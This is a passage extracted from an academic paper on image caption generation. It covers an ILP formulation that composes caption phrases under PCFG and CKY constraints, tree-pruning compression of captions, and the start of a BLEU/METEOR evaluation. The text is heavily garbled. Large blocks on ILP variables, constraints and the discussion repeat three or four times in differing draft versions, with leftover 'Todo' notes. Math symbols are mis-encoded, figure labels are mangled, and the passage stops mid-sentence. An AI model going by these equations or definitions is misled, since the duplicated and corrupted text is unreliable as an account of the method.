1} and r is h pq unless otherwise stated. The problem of choosing phrase order together with the best parse tree of the description is a com- plex optimization problem, which we solve using Integer Linear Programming (ILP). We use a sepa- rate ILP formulation for for sentence reordering and salient object selection, which we omit for brevity. As mentioned earlier, overall for each object we have four types of phrases. We use CKY-driven ILP formulation to combine them together into a plausi- ble descriptions which obeys PCFG rules. For the remainder of the paper we will call our ILP formu- lation ILP-TREE. We exploit Cplex (ILOG, Inc, 2006) to solve ILP problem. Todo:[mention cplex parameters. For instance, 30sec limit on generation] 3.0.2 ILP variables Phrase Indicator Variables: We define variables ↵ which indicate phrase selection and phrase ordering. ↵ijk = 1 iff phrase i of type j (1) is selected for position k 5There is only two children as we use Chomsky Normal Form ↵ij0 = 1 ↵ij1pq2 = 1 �02 S = 1 �010(NP!NP PP) = 1 �021 = 1 Where k 2 [0, N)Todo:[check for the whole pa- per if k ranges from 0] indexes one of N=4 positions in a sentence6. Phrase ordering is captured by indicator variables for adjacent pairs of phrases: ↵ijkpq(k+1) = 1 iff ↵ijk = ↵pq(k+1) = 1 (2) An example of ILP-CKY at Figure 3 shows selec- tion of phrases and their ordering: “The little boat”, “going out to sea” and “in the ocean”. Tree Indicator Variables: We also define variables �, which are indicators of CKY matrix content (Fig- ure 3). �ijs = 1 iff cell ij of the matrix is assigned (3) parse tree symbol s Todo:[Rename symbols to tags throughout the pa- per] Where i 2 [0, N) indexes CKY matrix diagonals and j 2 [0, N � i) indexes elements of diagonal i. In order to model rule selection at each CKY step, we define variables, which correspond to a PCFG rule used at the given cell ij of CKY matrix: �ijkr = 1 iff �ijh = �ikp (4) = �(k+1)jq = 1, Where r = h pq 2 R and k 2 [i, j). Value k corresponds to the choice of children for the current cell. 6The number of positions is equal to the number of phrase types level and each node of that level, algorithm has to decide, which parse tag to choose. This process is represented by assignment of a particular tag to a matrix cell. The chosen tag must be a head of a rule, fi example cell 12 is assigned tag V P , correspond- ing to rule V P ! V P PP . This rule connects leafs “going out to sea” and “in the ocean”. The prob- lem is to find tag assignment for each cell of the ma- trix, given some cells can be empty, if they do not connect children cells. latter correspond to children branches of the tree and belong to the previous diag- onal in the left-to-right order. Also we do not try all possible pairs5 of children from previous diagonal. We use technique similar to the one used in CKY parsing approach. Matrix cell pairs corresponding to <right,left> children pairs are < ik, (k + 1)j >, where k 2 [i, j). Here and for the remainder of the paper, notation [i, j) means {i, i + 1, ..., j � 1} and r is h pq unless otherwise stated. The problem of choosing phrase order together with the best parse tree of the description is a com- plex optimization problem, which we solve using Integer Linear Programming (ILP). We use a sepa- rate ILP formulation for for sentence reordering and salient object selection, which we omit for brevity. As mentioned earlier, overall for each object we have four types of phrases. We use CKY-driven ILP formulation to combine them together into a plausi- ble descriptions which obeys PCFG rules. For the remainder of the paper we will call our ILP formu- lation ILP-TREE. We exploit Cplex (ILOG, Inc, 2006) to solve ILP problem. Todo:[mention cplex parameters. For instance, 30sec limit on generation] 3.0.2 ILP variables Phrase Indicator Variables: We define variables ↵ which indicate phrase selection and phrase ordering. ↵ijk = 1 iff phrase i of type j (1) is selected for position k 5There is only two children as we use Chomsky Normal Form ↵ij0 = 1 ↵ij1pq2 = 1 �02 S = 1 �010(NP!NP PP) = 1 �021 = 1 Where k 2 [0, N)Todo:[check for the whole pa- per if k ranges from 0] indexes one of N=4 positions in a sentence6. Phrase ordering is captured by indicator variables for adjacent pairs of phrases: ↵ijkpq(k+1) = 1 iff ↵ijk = ↵pq(k+1) = 1 (2) An example of ILP-CKY at Figure 3 shows selec- tion of phrases and their ordering: “The little boat”, “going out to sea” and “in the ocean”. Tree Indicator Variables: We also define variables �, which are indicators of CKY matrix content (Fig- ure 3). �ijs = 1 iff cell ij of the matrix is assigned (3) parse tree symbol s Todo:[Rename symbols to tags throughout the pa- per] Where i 2 [0, N) indexes CKY matrix diagonals and j 2 [0, N � i) indexes elements of diagonal i. In order to model rule selection at each CKY step, we define variables, which correspond to a PCFG rule used at the given cell ij of CKY matrix: �ijkr = 1 iff �ijh = �ikp (4) = �(k+1)jq = 1, Where r = h pq 2 R and k 2 [i, j). Value k corresponds to the choice of children for the current cell. 6The number of positions is equal to the number of phrase types level and each node of that level, algorithm has to decide, which parse tag to choose. This process is represented by assignment of a particular tag to a matrix cell. The chosen tag must be a head of a rule, fi example cell 12 is assigned tag V P , correspond- ing to rule V P ! V P PP . This rule connects leafs “going out to sea” and “in the ocean”. The prob- lem is to find tag assignment for each cell of the ma- trix, given some cells can be empty, if they do not connect children cells. latter correspond to children branches of the tree and belong to the previous diag- onal in the left-to-right order. Also we do not try all possible pairs5 of children from previous diagonal. We use technique similar to the one used in CKY parsing approach. Matrix cell pairs corresponding to <right,left> children pairs are < ik, (k + 1)j >, where k 2 [i, j). Here and for the remainder of the paper, notation [i, j) means {i, i + 1, ..., j � 1} and r is h pq unless otherwise stated. The problem of choosing phrase order together with the best parse tree of the description is a com- plex optimization problem, which we solve using Integer Linear Programming (ILP). We use a sepa- rate ILP formulation for for sentence reordering and salient object selection, which we omit for brevity. As mentioned earlier, overall for each object we have four types of phrases. We use CKY-driven ILP formulation to combine them together into a plausi- ble descriptions which obeys PCFG rules. For the remainder of the paper we will call our ILP formu- lation ILP-TREE. We exploit Cplex (ILOG, Inc, 2006) to solve ILP problem. Todo:[mention cplex parameters. For instance, 30sec limit on generation] 3.0.2 ILP variables Phrase Indicator Variables: We define variables ↵ which indicate phrase selection and phrase ordering. ↵ijk = 1 iff phrase i of type j (1) is selected for position k 5There is only two children as we use Chomsky Normal Form ↵ij0 = 1 ↵ij1pq2 = 1 �02 S = 1 �010(NP!NP PP) = 1 �021 = 1 Where k 2 [0, N)Todo:[check for the whole pa- per if k ranges from 0] indexes one of N=4 positions in a sentence6. Phrase ordering is captured by indicator variables for adjacent pairs of phrases: ↵ijkpq(k+1) = 1 iff ↵ijk = ↵pq(k+1) = 1 (2) An example of ILP-CKY at Figure 3 shows selec- tion of phrases and their ordering: “The little boat”, “going out to sea” and “in the ocean”. Tree Indicator Variables: We also define variables �, which are indicators of CKY matrix content (Fig- ure 3). �ijs = 1 iff cell ij of the matrix is assigned (3) parse tree symbol s Todo:[Rename symbols to tags throughout the pa- per] Where i 2 [0, N) indexes CKY matrix diagonals and j 2 [0, N � i) indexes elements of diagonal i. In order to model rule selection at each CKY step, we define variables, which correspond to a PCFG rule used at the given cell ij of CKY matrix: �ijkr = 1 iff �ijh = �ikp (4) = �(k+1)jq = 1, Where r = h pq 2 R and k 2 [i, j). Value k corresponds to the choice of children for the current cell. 6The number of positions is equal to the number of phrase types k=0$ of two variables have been discussed by Clarke and Lapata (2008). For Equation 2, we add the follow- ing constraints (similar constraints are also added for Equations 4,5). 8ijkpqm, ↵ijk  ↵ik (7) ↵ijk  ↵j(k+1) ↵ijk + (1 � ↵ik) + (1 � ↵j(k+1)) � 1 Consistency between Tree Leafs and Sequences: The ordering of phrases implied by ↵ijk must be consistent with the ordering of phrases implied by the � variables. This can be achieved by aligning the leaf cells (i.e., �kks) in the CKY-style matrix with ↵ variables as follows: 8ik, ↵ik  X s2Si �kks (8) 8k, X i ↵ik = X s2S �kks (9) Where Si refers to the set of PCFG nonterminals that are compatible with the phrase type of pi. For example, Si = {NN,NP, ...} if pi corresponds to an “object” (noun-phrase). Thus, Equation 8 en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. Equation 9 enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. Tree Congruence Constraints: To ensure that each CKY cell has at most one symbol we require 8ij, X s2S �ijs  1 (10) We also require that 8i,j>i,h, �ijh = j�1X k=i X r2Rh �ijkr (11) Where Rh = {r 2 R : r = h ! pq}. We enforce these constraints only for non-leafs. This constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing PCFG rule. We also ensure that we produce a valid tree struc- ture. For instance, if we select 3 phrases as shown in Figure 3, we must have the root of the tree at the corresponding cell 02. 8k2[1,N), X s2S �kks  N�1X t=k X s2S �0ts (12) We also require cells that are not selected for the resulting parse structure to be empty: 8ij X k �ijk  1 (13) ↵i0 = 1 (14) ↵ij1 = 1 (15) Additionally, we penalize solutions without the S tag at the parse root as a soft-constraint. Miscellaneous Constraints: Finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: (1) en- force that a noun-phrase is selected (to ensure se- mantic relevance to the image content), (2) allow at most one phrase of each type, (3) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), (4) allow at most one scene phrase for all sentences in the description. We find that han- dling of sentence boundaries is important if the ILP formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries. 3.4 Discussion An interesting aspect of description generation ex- plored in this paper is that building blocks of com- position are tree fragments, rather than individual words. There are three practical benefits: (1) syn- tactic and semantic expressiveness, (2) correctness, and (3) computational efficiency. Because we ex- tract nice segments from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. Our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. Also, because the unit of operation is tree frag- ments, the ILP formulation encoded in this work is computationally lightweight. If the unit of compo- sition was words, the ILP instances would be sig- nificantly more computationally intensive, and more likely to suffer from grammatical and semantic er- rors. of two variables have been discussed by Clarke and Lapata (2008). For Equation 2, we add the follow- ing constraints (similar constraints are also added for Equations 4,5). 8ijkpqm, ↵ijk  ↵ik (7) ↵ijk  ↵j(k+1) ↵ijk + (1 � ↵ik) + (1 � ↵j(k+1)) � 1 Consistency between Tree Leafs and Sequences: The ordering of phrases implied by ↵ijk must be consistent with the ordering of phrases implied by the � variables. This can be achieved by aligning the leaf cells (i.e., �kks) in the CKY-style matrix with ↵ variables as follows: 8ik, ↵ik  X s2Si �kks (8) 8k, X i ↵ik = X s2S �kks (9) Where Si refers to the set of PCFG nonterminals that are compatible with the phrase type of pi. For example, Si = {NN,NP, ...} if pi corresponds to an “object” (noun-phrase). Thus, Equation 8 en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. Equation 9 enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. Tree Congruence Constraints: To ensure that each CKY cell has at most one symbol we require 8ij, X s2S �ijs  1 (10) We also require that 8i,j>i,h, �ijh = j�1X k=i X r2Rh �ijkr (11) Where Rh = {r 2 R : r = h ! pq}. We enforce these constraints only for non-leafs. This constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing PCFG rule. We also ensure that we produce a valid tree struc- ture. For instance, if we select 3 phrases as shown in Figure 3, we must have the root of the tree at the corresponding cell 02. 8k2[1,N), X s2S �kks  N�1X t=k X s2S �0ts (12) We also require cells that are not selected for the resulting parse structure to be empty: 8ij X k �ijk  1 (13) ↵i0 = 1 (14) ↵ij1 = 1 (15) Additionally, we penalize solutions without the S tag at the parse root as a soft-constraint. Miscellaneous Constraints: Finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: (1) en- force that a noun-phrase is selected (to ensure se- mantic relevance to the image content), (2) allow at most one phrase of each type, (3) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), (4) allow at most one scene phrase for all sentences in the description. We find that han- dling of sentence boundaries is important if the ILP formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries. 3.4 Discussion An interesting aspect of description generation ex- plored in this paper is that building blocks of com- position are tree fragments, rather than individual words. There are three practical benefits: (1) syn- tactic and semantic expressiveness, (2) correctness, and (3) computational efficiency. Because we ex- tract nice segments from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. Our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. Also, because the unit of operation is tree frag- ments, the ILP formulation encoded in this work is computationally lightweight. If the unit of compo- sition was words, the ILP instances would be sig- nificantly more computationally intensive, and more likely to suffer from grammatical and semantic er- rors. of two variables have been discussed by Clarke and Lapata (2008). For Equation 2, we add the follow- ing constraints (similar constraints are also added for Equations 4,5). 8ijkpqm, ↵ijk  ↵ik (7) ↵ijk  ↵j(k+1) ↵ijk + (1 � ↵ik) + (1 � ↵j(k+1)) � 1 Consistency between Tree Leafs and Sequences: The ordering of phrases implied by ↵ijk must be consistent with the ordering of phrases implied by the � variables. This can be achieved by aligning the leaf cells (i.e., �kks) in the CKY-style matrix with ↵ variables as follows: 8ik, ↵ik  X s2Si �kks (8) 8k, X i ↵ik = X s2S �kks (9) Where Si refers to the set of PCFG nonterminals that are compatible with the phrase type of pi. For example, Si = {NN,NP, ...} if pi corresponds to an “object” (noun-phrase). Thus, Equation 8 en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. Equation 9 enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. Tree Congruence Constraints: To ensure that each CKY cell has at most one symbol we require 8ij, X s2S �ijs  1 (10) We also require that 8i,j>i,h, �ijh = j�1X k=i X r2Rh �ijkr (11) Where Rh = {r 2 R : r = h ! pq}. We enforce these constraints only for non-leafs. This constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing PCFG rule. We also ensure that we produce a valid tree struc- ture. For instance, if we select 3 phrases as shown in Figure 3, we must have the root of the tree at the corresponding cell 02. 8k2[1,N), X s2S �kks  N�1X t=k X s2S �0ts (12) We also require cells that are not selected for the resulting parse structure to be empty: 8ij X k �ijk  1 (13) Fi (14) Fij (15) Additionally, we penalize solutions without the S tag at the parse root as a soft-constraint. Miscellaneous Constraints: Finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: (1) en- force that a noun-phrase is selected (to ensure se- mantic relevance to the image content), (2) allow at most one phrase of each type, (3) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), (4) allow at most one scene phrase for all sentences in the description. We find that han- dling of sentence boundaries is important if the ILP formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries. 3.4 Discussion An interesting aspect of description generation ex- plored in this paper is that building blocks of com- position are tree fragments, rather than individual words. There are three practical benefits: (1) syn- tactic and semantic expressiveness, (2) correctness, and (3) computational efficiency. Because we ex- tract nice segments from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. Our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. Also, because the unit of operation is tree frag- ments, the ILP formulation encoded in this work is computationally lightweight. If the unit of compo- sition was words, the ILP instances would be sig- nificantly more computationally intensive, and more likely to suffer from grammatical and semantic er- rors. of two variables have been discussed by Clarke and Lapata (2008). For Equation 2, we add the follow- ing constraints (similar constraints are also added for Equations 4,5). 8ijkpqm, ↵ijk  ↵ik (7) ↵ijk  ↵j(k+1) ↵ijk + (1 � ↵ik) + (1 � ↵j(k+1)) � 1 Consistency between Tree Leafs and Sequences: The ordering of phrases implied by ↵ijk must be consistent with the ordering of phrases implied by the � variables. This can be achieved by aligning the leaf cells (i.e., �kks) in the CKY-style matrix with ↵ variables as follows: 8ik, ↵ik  X s2Si �kks (8) 8k, X i ↵ik = X s2S �kks (9) Where Si refers to the set of PCFG nonterminals that are compatible with the phrase type of pi. For example, Si = {NN,NP, ...} if pi corresponds to an “object” (noun-phrase). Thus, Equation 8 en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. Equation 9 enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. Tree Congruence Constraints: To ensure that each CKY cell has at most one symbol we require 8ij, X s2S �ijs  1 (10) We also require that 8i,j>i,h, �ijh = j�1X k=i X r2Rh �ijkr (11) Where Rh = {r 2 R : r = h ! pq}. We enforce these constraints only for non-leafs. This constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing PCFG rule. We also ensure that we produce a valid tree struc- ture. For instance, if we select 3 phrases as shown in Figure 3, we must have the root of the tree at the corresponding cell 02. 8k2[1,N), X s2S �kks  N�1X t=k X s2S �0ts (12) We also require cells that are not selected for the resulting parse structure to be empty: 8ij X k �ijk  1 (13) Fi (14) Fij (15) Additionally, we penalize solutions without the S tag at the parse root as a soft-constraint. Miscellaneous Constraints: Finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: (1) en- force that a noun-phrase is selected (to ensure se- mantic relevance to the image content), (2) allow at most one phrase of each type, (3) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), (4) allow at most one scene phrase for all sentences in the description. We find that han- dling of sentence boundaries is important if the ILP formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries. 3.4 Discussion An interesting aspect of description generation ex- plored in this paper is that building blocks of com- position are tree fragments, rather than individual words. There are three practical benefits: (1) syn- tactic and semantic expressiveness, (2) correctness, and (3) computational efficiency. Because we ex- tract nice segments from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. Our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. Also, because the unit of operation is tree frag- ments, the ILP formulation encoded in this work is computationally lightweight. If the unit of compo- sition was words, the ILP instances would be sig- nificantly more computationally intensive, and more likely to suffer from grammatical and semantic er- rors. Figure 3: CKY-style representation of decision variables as defined in §3.1 for the tree example in Fig 2. Non- terminal symbols in boldface (in blue) and solid arrows (also in blue) represent the chosen PCFG rules to com- bine the selected set of phrases. Nonterminal symbols in smaller font (in red) and dotted arrows (also in red) rep- resent possible other choices that are not selected. This objective is comprised of three types of weights (confidence scores): Fi,Fij,Fr.4 Fi represents the phrase selection score based on visual similarity, de- scribed in §2. Fij quantifies the sequence cohe- sion across phrase boundaries. For this, we use n- gram scores (n ∈ [2, 5]) between adjacent phrases computed using the Google Web 1-T corpus (Brants and Franz., 2006). Finally, Fr quantifies PCFG rule scores (log probabilities) estimated from the 1M im- age caption corpus (Ordonez et al., 2011) parsed us- ing the Stanford parser (Klein and Manning, 2003). One can view Fi as a content selection score, while Fij and Fr correspond to linguistic fluency scores capturing sequence and tree structure respec- tively. If we set positive values for all of these weights, the optimization function would be biased toward verbose production, since selecting an addi- tional phrase will increase the objective function. To control for verbosity, we set scores corresponding to linguistic fluency, i.e., Fij and Fr using negative values (smaller absolute values for higher fluency), to balance dynamics between content selection and linguistic fluency. 3.3 ILP Constraints Soundness Constraints: We need constraints to enforce consistency between different types of vari- 4All weights are normalized using z-score. 354 ables (Equations 2, 4, 5). Constraints for a product of two variables have been discussed by Clarke and Lapata (2008). For Equation 2, we add the follow- ing constraints (similar constraints are also added for Equations 4,5). ∀ijk, αijk ≤ αik (7) αijk ≤ αj(k+1) αijk + (1 −αik) + (1 −αj(k+1)) ≥ 1 Consistency between Tree Leafs and Sequences: The ordering of phrases implied by αijk must be consistent with the ordering of phrases implied by the β variables. This can be achieved by aligning the leaf cells (i.e., βkks) in the CKY-style matrix with α variables as follows: ∀ik,αik ≤ ∑ s∈NT i βkks (8) ∀k, ∑ i αik = ∑ s∈NT βkks (9) Where NT i refers to the set of PCFG nonterminals that are compatible with a phrase type pt(i) of pi. For example, NT i = {NN,NP, ...} if pi corresponds to an “object” (noun-phrase). Thus, Equation 8 en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. Equation 9 enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. Tree Congruence Constraints: To ensure that each CKY cell has at most one symbol we require ∀ij, ∑ s∈NT βijs ≤ 1 (10) We also require that ∀i,j>i,h, βijh = j−1∑ k=i ∑ r∈Rh βijkr (11) Where Rh = {r ∈ R : r = h → pq}. We enforce these constraints only for non-leafs. This constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing PCFG rule. We also ensure that we produce a valid tree struc- ture. For instance, if we select 3 phrases as shown in Figure 3, we must have the root of the tree at the corresponding cell 02. ∀k∈[1,N), ∑ s∈NT βkks ≤ N−1∑ t=k ∑ s∈NT β0ts (12) We also require cells that are not selected for the resulting parse structure to be empty: ∀ij ∑ k γijk ≤ 1 (13) Additionally, we penalize solutions without the S tag at the parse root as a soft-constraint. Miscellaneous Constraints: Finally, we include several constraints to avoid degenerate solutions or to otherwise enhance the composed output. We: (1) enforce that a noun-phrase is selected (to ensure se- mantic relevance to the image content), (2) allow at most one phrase of each type, (3) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), (4) allow at most one scene phrase for all sentences in the description. We find that han- dling of sentence boundaries is important if the ILP formulation is based only on sequence structure, but with the integration of tree-based structure, we do not need to specifically handle sentence boundaries. 3.4 Discussion An interesting aspect of description generation ex- plored in this paper is using tree fragments as the building blocks of composition rather than individ- ual words. There are three practical benefits: (1) syntactic and semantic expressiveness, (2) correct- ness, and (3) computational efficiency. Because we extract phrases from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. Our phrase ex- traction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. Also, because the unit of operation is tree fragments, the ILP formulation encoded in this work is com- putationally lightweight. If the unit of composition was words, the ILP instances would be significantly more computationally intensive, and more likely to suffer from grammatical and semantic errors. 4 Tree Compression As noted by recent studies (Mason and Charniak, 2013; Kuznetsova et al., 2013; Jamieson et al., 2010), naturally existing image captions often in- clude contextual information that does not directly describe visual content, which ultimately hinders their usefulness for describing other images. There- fore, to improve the fidelity of the generated descrip- tions, we explore image caption generalization as an 355 Late%in%the%day,%a,er%my%sunset%shot% a2empts,%my%cat%strolled%along%the% fence%and%posed%for%this%classic%profile% Late%in%the%day%%%cat%% % posed%for%this%profile% Generaliza)on+ This%bridge%stands% late%in%the%day,% a,er%my%sunset%shot% a2empts% A%cat% strolled%along%the%fence% and%posed%for%this%classic%profile% Figure 4: Compressed captions (on the left) are more ap- plicable for describing new images (on the right). optional pre-processing step. Figure 4 illustrates a concrete example of image caption generalization in the context of image caption generation. We cast caption generalization as sentence com- pression. We encode the problem as tree pruning via lightweight CKY parsing, while also incorporating several other considerations such as leaf-level ngram cohesion scores and visually informed content selec- tion. Figure 5 shows an example compression, and Figure 6 shows the corresponding CKY matrix. At a high level, the compression operation resem- bles bottom-up CKY parsing, but in addition to pars- ing, we also consider deletion of parts of the trees. When deleting parts of the original tree, we might need to re-parse the remainder of the tree. Note that we consider re-parsing only with respect to the orig- inal parse tree produced by a state-of-the-art parser, hence it is only a light-weight parsing.5 4.1 Dynamic Programming Input to the algorithm is a sentence, represented as a vector x = x0...xn−1 = x[0 : n− 1], and its PCFG parse π(x) obtained from the Stanford parser. For simplicity of notation, we assume that both the parse tree and the word sequence are encoded in x. Then, the compression can be formalized as: 5Integrating full parsing into the original sentence would be a straightforward extension conceptually, but may not be an em- pirically better choice when parsing for compression is based on vanilla unlexicalized parsing. ŷ = arg max y ∏ i φi(x,y) (14) Where each φi is a potential function, corresponding to a criteria of the desired compression: φi(x,y) = exp(θi ·fi(x,y)) (15) Where θi is the weight for a particular criteria (de- scribed in §4.2), whose scoring function is fi. We solve the decoding problem (Equation 14) us- ing dynamic programming. For this, we need to solve the compression sub-problems for sequences x[i : j], which can be viewed as branches ŷ[i,j] of the final tree ŷ[0 : n− 1]. For example, in Figure 5, the final solution is ŷ[0 : 7], while a sub-solution of x[4 : 7] corresponds to a tree branch PP . Notice that sub-solution ŷ[3 : 7] represents the same branch as ŷ[4 : 7] due to branch deletion. Some computed sub-solutions, e.g., ŷ[1 : 4], get dropped from the final compressed tree. We define a matrix of scores D[i,j,h] (Equa- tion 17), where h is one of the nonterminal symbols being considered for a cell indexed by i,j, i.e. a can- didate for the root symbol of a branch ŷ[i : j]. When all values D[i,j,h] are computed, we take ĥ = arg max h D[0,n− 1,h] (16) and backtrack to reconstruct the final compression (the exact solution to equation 14). D[i,j,h] = max k ∈ [i, j) r ∈ Rh    (1) D[i,k,p] + D[k + 1,j,q] +∆φ[r,ij] (2) D[i,k,p] + ∆φ[r,ij] (3) D[k + 1,j,p] + ∆φ[r,ij] (17) Where Rh = {r ∈ R : r = h → pq ∨ r = h → p}. Index k determines a split point for child branches of a subtree ŷ[i : j]. For example, in the Figure 5 the split point for children of the subtree ŷ[0 : 7] is k = 2. The three cases ((1) – (3)) of the above equation correspond to the following tree pruning cases: Pruning Case (1): None of the children of the cur- rent node is deleted. For example, in Figures 5 and 6, the PCFG rule PP → IN PP , corresponding to the sequence “in black and white”, is retained. Another situation that can be encountered is tree re- parsing. 356 Vintage! motorcycle! shot! done! in! black! and! white! JJ! NN! NN! VBN! IN! JJ! JJ!CC! NP, NN! NP! CC-JJ VP, PP NP! PP S Dele%on! probability! Rule! probability! Vision! confidence! Ngram! cohesion! (Dele%on,)case)2)) (Dele%on,)case)1)) 0 1 2 3 4 5 6 7 k=2$ Figure 5: CKY compression. Both the chosen rules and phrases (blue bold font and blue solid arrows) and not chosen rules and phrases (red italic smaller font and red dashed lines) are shown. Pruning Case (2)/(3): Deletion of the left/right child respectively. There are two types of deletion, as illustrated in Figures 5 and 6. The first corre- sponds to deletion of a child node. For example, the second child NN of rule NP → NP NN is deleted, which yields deletion of “shot”. The sec- ond type is a special case of propagating a node to a higher-level of the tree. In Figure 6, this sit- uation occurs when deleting JJ “Vintage”, which causes the propagation of NN from cell 11 to cell 01. For this purpose, we expand the set of rules R with additional special rules of the form h → h, e.g., NN → NN, which allows propagation of tree nodes to higher levels of the compressed tree.6 4.2 Modeling Compression Criteria The ∆φ term7 in Equation 17 denotes the sum of log of potential functions for each criteria q: ∆φ[r,ij] = ∑ q θ · ∆fq(r,ij) (18) Note that ∆φ depends on the current rule r, along with the historical information before the current step ij, such as the original rule rij, and ngrams on the border between left and right child branches of rule rij. We use the following four criteria fq in our model, which are demonstrated in Figures 5 and 6. I. Tree Structure: We capture PCFG rule prob- abilities estimated from the corpus as ∆fpcfg = log Ppcfg(r). 6We assign probabilities of these special propagation rules to 1 so that they will not affect the final parse tree score. Turner and Charniak (2005) handled propagation cases similarly. 7We use ∆ to distinguish the potential value for the whole sentence from the gain of the potential during a single step of the algorithm. JJ NP, NN NP S Vintage NN motorcycle NN shot VBN VP, PP done IN PP in JJ NP black CC CC-JJ and JJ white 00" 11" 01" Rule% probability% Ngram% cohesion% Dele6on% probability% Vision% Confidence% i" j" Figure 6: CKY compression. Both the chosen rules and phrases (blue bold font and blue solid arrows) and not chosen rules and phrases (red italic smaller font and red dashed lines) are shown. II. Sequence Structure: We incorporate ngram cohesion scores only across the border between two branches of a subtree. III. Branch Deletion Probabilities: We compute probabilities of deletion for children as: ∆fdel = log P(rt|rij) = log count(rt,rij) count(rij) (19) Where count(rt,rij) is the frequency in which rij is transformed to rt by deletion of one of the children. We estimate this probability from a training corpus, described in §4.3. count(rij) is the count of rij in uncompressed sentences. IV. Vision Detection (Content Selection): We want to keep words referring to actual objects in the image. Thus, we use V (xj), a visual similarity score, as our confidence of an object corresponding to word xj. This similarity is obtained from the vi- sual recognition predictions of (Deng et al., 2012b). Note that some test instances include rules that we have not observed during training. We default to the original caption in those cases. The weights θi are set using a tuning dataset. We control over- compression by setting the weight for fdel to a small value relative to the other weights. 4.3 Human Compressed Captions Although we model image caption generalization as sentence compression, in practical applications we may want the outputs of these two tasks to be differ- ent. For example, there may be differences in what should be deleted (named entities in newswire sum- maries could be important to keep, while they may 357 Orig:"Note"the"pillows,"they"match"the" chair"that"goes"with"it,"plus"the"table" in"the"picture"is"included.% SeqCompression:%The"table"in"the" picture." " TreePruning:"The"chair"with"the"table" in"the"picture." Orig:"Only"in"winter;me"we"see" these"birds"here"in"the"river." % SeqCompression:"See"these"birds" in"the"river." " TreePruning:"These"birds"in"the" river."" Orig:"The"world's"most"powerful" lighthouse"si@ng"beside"the"house" with"the"world's"thickest"curtains." SeqCompression:%Si@ng"beside" the"house" " TreePruning:"Powerful"lighthouse" beside"the"house"with"the" curtains."" Orig:"Orange"cloud"on"street" light"C"near"Lanakila"Street" (phone"camera)." " SeqCompression:%Orange"street" " TreePruning:"Phone"camera.% Relevance(problem( Orig:"There's"something"about" having"5"trucks"parked"in"front"of"my" house"that"makes"me"feel"all" importantClike." SeqCompression:%Front"of"my"house." " TreePruning:"Trucks"in"front"my" house.% Grammar(mistakes( Figure 7: Caption generalization: good/bad examples. be extraneous for image caption generalization). To learn the syntactic patterns for caption generaliza- tion, we collect a small set of example compressed captions (380 in total) using Amazon Mechanical Turk (AMT) (Snow et al., 2008). For each image, we asked 3 turkers to first list all visible objects in an image and then to write a compressed caption by removing not visually verifiable bits of text. We then align the original and compressed captions to mea- sure rule deletion probabilities, excluding misalign- ments, similar to Knight and Marcu (2000). Note that we remove this dataset from the 1M caption cor- pus when we perform description generation. 5 Experiments We use the 1M captioned image corpus of Ordonez et al. (2011). We reserve 1K images as a test set, and use the rest of the corpus for phrase extraction. We experiment with the following approaches: Proposed Approaches: • TREEPRUNING: Our tree compression ap- proach as described in §4. • SEQ+TREE: Our tree composition approach as described in §3. • SEQ+TREE+PRUNING: SEQ+TREE using compressed captions of TREEPRUNING as building blocks. Baselines for Composition: • SEQ+LINGRULE: The most equivalent to the older sequence-driven system (Kuznetsova et al., 2012). Uses a few minor enhancements, such as sentence-boundary statistics, to im- prove grammaticality. • SEQ: The §3 system without tree models and mentioned enhancements of SEQ+LINGRULE. Method Bleu Meteor w/ (w/o) penalty P R M SEQ+LINGRULE 0.152 (0.152) 0.13 0.17 0.095 SEQ 0.138 (0.138) 0.12 0.18 0.094 SEQ+TREE 0.149 (0.149) 0.13 0.14 0.082 SEQ+PRUNING 0.177 (0.177) 0.15 0.16 0.101 SEQ+TREE+PRUNING 0.140 (0.189) 0.16 0.12 0.088 Table 1: Automatic Evaluation • SEQ+PRUNING: SEQ using compressed cap- tions of TREEPRUNING as building blocks. We also experiment with the compression of human written captions, which are used to generate image descriptions for the new target images. Baselines for Compression: • SEQCOMPRESSION (Kuznetsova et al., 2013): Inference operates over the sequence structure. Although optimization is subject to constraints derived from dependency parse, parsing is not an explicit part of the inference structure. Ex- ample outputs are shown in Figure 7. 5.1 Automatic Evaluation We perform automatic evaluation using two mea- sures widely used in machine translation: BLEU (Pa- pineni et al., 2002)8 and METEOR (Denkowski and Lavie, 2011).9 We remove all punctuation and con- vert captions to lower case. We use 1K test im- ages from the captioned 